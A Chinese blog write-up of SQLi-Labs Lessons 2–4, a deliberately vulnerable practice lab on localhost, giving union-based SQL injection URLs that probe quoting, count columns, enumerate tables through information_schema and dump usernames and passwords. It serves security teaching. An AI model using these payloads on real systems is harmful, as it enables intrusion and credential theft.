Sqli-Labs:Less2-Less4

Less2-Less4和Less1的查询语句类似,只是引号及括号的区别。

Less2

基于错误_GET_数字型注入

http://localhost:8088/sqlilabs/Less-2/?id=1
http://localhost:8088/sqlilabs/Less-2/?id=1'
http://localhost:8088/sqlilabs/Less-2/?id=1"

第一条正常,第二、第三条报错:数字型注入
查询语句:

select username,password from table_name where id=$_GET['id'] limit 0,1

http://localhost:8088/sqlilabs/Less-2/?id=1 order by 4--+

3个字段

http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,3--+

第2、第3字段

http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,concat_ws('-',user(),database())--+

数据库:security

http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

表名:users

http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+

字段名:id、username、password

http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from users--+

END.

Less3

基于错误_GET_单引号_小括号_字符型注入

http://localhost:8088/sqlilabs/Less-3/?id=1
http://localhost:8088/sqlilabs/Less-3/?id=1'
http://localhost:8088/sqlilabs/Less-3/?id=1"


第一、第三条正常,第二条报错:字符型注入
查询语句:

select username,password from table_name where id=('$_GET['id']') limit 0,1

http://localhost:8088/sqlilabs/Less-3/?id=1') order by 4--+

3个字段

http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,3--+

第2、第3字段

http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,concat_ws('-',user(),database())--+

数据库:security

http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

表名:users

http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+

字段名:id、username、password

http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,group_concat(username),group_concat(password) from users--+

END.

Less4

基于错误_GET_双引号_小括号_字符型注入

http://localhost:8088/sqlilabs/Less-4/?id=1
http://localhost:8088/sqlilabs/Less-4/?id=1'
http://localhost:8088/sqlilabs/Less-4/?id=1"


第一、第二条正常,第三条报错:字符型注入
查询语句:

select username,password from table_name where id=("$_GET['id']") limit 0,1

http://localhost:8088/sqlilabs/Less-4/?id=1") order by 4--+

3个字段

http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,3--+

第2、第3字段

http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,concat_ws('-',user(),database())--+

数据库:security

http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

表名:users

http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+

字段名:id、username、password

http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,group_concat(username),group_concat(password) from users--+

END.

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • sqli-labs(less1-less22)
    http://127.0.0.1/sqli-labs-master 浅析MySQL中concat以及group_c...
    BerL1n阅读 8,655评论 0 4
  • Sqli-Labs:Less1
    基于错误_GET_单引号_字符型注入 在打第一关的同时把以前学的零散的Sqli和Mysql的知识做个总结。参考教程...
    Hyafinthus阅读 2,123评论 3 11
  • pySpark 中文API (2)
    pyspark.sql模块 模块上下文 Spark SQL和DataFrames的重要类: pyspark.sql...
    mpro阅读 9,504评论 0 13
  • 高级绕过总结
    web应用程序会对用户的输入进行验证,过滤其中的一些关键字,这种过滤我们可以试着用下面的方法避开。 1、 不使用被...
    查无此人asdasd阅读 7,348评论 0 5
  • 当电子数码产品来袭
    当电子数码产品来袭 是非 儿子开始了解《西游记》这部著作是这假期的事。 缘于这个暑期语文老师布置作业,假期...
    是非成败阅读 219评论 0 1